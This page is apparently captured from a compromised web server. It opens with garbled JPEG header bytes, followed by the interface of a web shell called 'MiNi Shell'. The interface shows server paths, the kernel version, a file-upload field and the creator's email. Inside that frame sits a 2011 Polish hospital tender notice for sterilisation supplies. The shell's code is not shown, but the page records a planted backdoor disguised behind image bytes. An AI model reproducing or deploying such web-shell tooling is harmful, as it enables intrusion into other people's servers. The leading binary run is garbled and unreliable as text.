JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110418/81316-N-2011.html

<p class="kh_header"><b>Gdańsk: PN - 39/16/24/2011/Sterylizacja</b><br>
<b>Numer ogłoszenia: 81316 - 2011; data zamieszczenia: 18.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny św. Wojciecha Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Jana Pawła II 50, 80-462 Gdańsk, woj. pomorskie, tel. (58) 556 45 15, 7684281, faks (58) 556 36 18, 7614629.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN - 39/16/24/2011/Sterylizacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1	Przedmiotem zamówienia jest dostawa opakowań sterylizacyjnych, naboi z tlenkiem etylenu i testów do kontroli sterylizacji dla Szpitala, obejmujących:
	      Pakiet nr 1 - rękawy papierowo-foliowe;
      Pakiet nr 2 - torebki papierowo-foliowe;
      Pakiet nr 3 - papier sterylizacyjny krepowy;
      Pakiet nr 4 - naboje z tlenkiem etylenu;
	      Pakiet nr 5 - wskaźnik biologiczny do pary wodnej i tlenku etylenu;
      Pakiet nr 6 - wskaźnik biologiczny do kontroli sterylizacji niskotemperaturową parą wodną oraz jałowa pożywka w probówkach;
      Pakiet nr 7 - 	wskaźnik kontroli zgrzewania, plomby papierowe, wieloparametrowy wskaźnik chemiczny klasy 4, wskaźnik Bowie-Dicka, taśma wskaźnikowa, taśma zamykająca bez wskaźnika;     
      Pakiet nr 8 - wskaźnik biologiczny do tlenku etylenu, wskaźnik biologiczny do pary wodnej, fiołkowy, przyrząd testowy PCD do wskaźników biologicznych, przyrząd testowy PCD do kontroli wsadu narzędzi okulistycznych, wskaźnik chemiczny kontroli wsadu podczas sterylizacji tlenkiem etylenu, paskowy wskaźnik usuwania powietrza i penetracji pary, etykiety dwukrotnie przylepne ze wskaźnikiem do pary wodnej, etykiety w kolorze czerwonym i zielonym; 
      Pakiet nr 9 - 	test kontroli skuteczności mycia-płytka ze stali nierdzewnej z naniesioną substancją barwną stymulującą krew ludzką, przyrząd testowy procesu stymulujący endoskopy giętkie z adapterem do myjni dezynfekcyjnych.

Realizacja umowy - przez 15 m-cy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.70.00.00-7, 33.77.00.00-8, 33.19.11.00-6, 33.14.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli: 
 1. Wykonawca w okresie ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, wykonał co najmniej 3 dostawy o podobnym charakterze (w zakresie pakietu, na który Wykonawca składa ofertę oraz poniższego zakresu jako odpowiadające):
  Pakiet nr 1 - 3 - opakowania do sterylizacji; 
  Pakiet nr 4 - naboje z tlenkiem etylenu;
  Pakiet nr 5 - 9 testy do kontroli sterylizacji;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. aktualnie datowany katalog oferowanego przedmiotu zamówienia, Wykonawca zaznaczy kolorowym zakreślaczem pozycje oferowaną, zaznaczając jednocześnie numer pakietu i pozycji do której przynależą;
2. dokumenty dopuszczające oferowany produkt do obrotu na terenie RP - zgodnie z zapisem pkt. 1.4 i 1.5 SIWZ, jak niżej:
-	dla pakietu nr 1 i 2 należy załączyć deklarację zgodności i zgłoszenie do rejestru wyrobów medycznych, specyfikacje (karty charakterystyki) techniczne wydane przez producenta (-ów) papieru i folii, w celu potwierdzenia i oceny parametrów papieru i folii za zgodność z SIWZ oraz z normami PN-EN-ISO 11607 i PN-EN 868,
-	dla pakietu nr 3 należy załączyć deklaracje zgodności i zgłoszenie do rejestru wyrobów medycznych, specyfikacje (karty charakterystyki) techniczne wydane przez producenta (-ów) papieru, w celu potwierdzenia i oceny parametrów papieru na zgodność z SIWZ oraz z normami PN-EN 868 i PN-EN-ISO 11607,
-	 Zamawiający wymaga podania numerów katalogowych towarów i potwierdzonych kopii etykiet z opakowań transportowych (kartonów). Numery katalogowe oferowanych produktów muszą być zgodne z numerami wpisanymi do zgłoszenia w Urzędzie Rejestracji Wyrobów Medycznych lub w deklaracji zgodności CE.
-	dla pakietu nr 4 - opis produktu i karta charakterystyki substancji niebezpiecznej - aktualna i czytelna.
-	dla pakietu nr 5:
- deklaracja zgodność potwierdzona certyfikatem wydanym przez jednostkę notyfikowaną, charakterystyka produktów zawierająca numery kolekcji szczepów, wielkość populacji spor, dane dotyczące oporności i interpretacji wyników
-	 dla pakietu nr 6  - do poz. 1 - deklaracja zgodność potwierdzona certyfikatem wydanym przez jednostkę notyfikowaną lub przez producenta, charakterystyka produktów zawierająca numery kolekcji szczepów, wielkość populacji spor, dane dotyczące oporności i interpretacji wyników
                   - do poz. 2 - deklaracja zgodności produktu i opis produktu zawierający skład pożywki, warunki przechowywania przed użyciem, hodowli i interpretacja wyników
-	dla pakietu 7 - poz. 1 do 4 - deklaracja zgodność, charakterystyka produktów zawierająca dano o interpretacji wyników
- poz. 5 i 6 - charakterystyka wyrobu
-	dla pakietu 8 - poz. 1 - deklaracja zgodność potwierdzona certyfikatem wydanym przez jednostkę notyfikowaną lub przez producenta, charakterystyka produktów zawierająca numery kolekcji szczepów, wielkość populacji spor, dane dotyczące oporności i interpretacji wyników
- poz. 2 do 6 - 	deklaracja zgodności i charakterystyka produktów zawierająca instrukcję użycia
- poz. 7 - 	deklaracja zgodności wskaźnika i przyrządów potwierdzona certyfikatem jednostki notyfikowanej, charakterystyka produktu
- poz. 8 - charakterystyka produktu
-	dla pakietu 9 -  deklaracja zgodność potwierdzona certyfikatem wydanym przez jednostkę notyfikowaną, charakterystyka produktów zawierająca instrukcję użycia i przechowywania wskaźników.
3.   wzory, w ilości:
- pakiet nr 1 - minimum 3 mb rękawa bez fałdy i 3 m rękawa z fałdą o szerokości nie mniejszej niż 10 cm
- pakiet nr 2 - po 5 szt. torebek każdego rozmiaru
	- pakiet nr 3 - po 5 arkuszy z każdego rozmiaru i koloru (5 białych i 5 kolorowych z każdego rozmiaru),
- pakiet nr 4 - wzory nie są wymagane
- pakiet nr 5 - po 5 szt. z każdej pozycji
- pakiet nr 6 - po 5 szt. z każdej pozycji
- pakiet nr 7 - poz. 1, 2, 3 - po 10 szt.
                     - poz. 4 - 3 szt.
                     - poz. 5, 6 - po 2 szt.
- pakiet nr 8 - poz. 1, 2 - po 5 szt.
                    - poz. 3, 4 - po 1 szt.
                     - poz. 5, 6, 7 - po 10 szt. pasków
                     - poz. 8.1 i 8.2 - po 1 rolce
- pakiet nr 9 - poz. 1 - 10 szt.
                     - poz. 2  - 1 szt.
Wzory mają być zaopatrzone w oryginalne etykiety lub kopie potwierdzone za zgodność z oryginałem, oznakowane numerem pakietu i pozycji w pakiecie.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Opisane w SIWZ- pokt. 17</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający pok. 092 i www.szpital.gda.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2011 godzina 12:00, miejsce: Zamawiający, pok. 44 - Sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com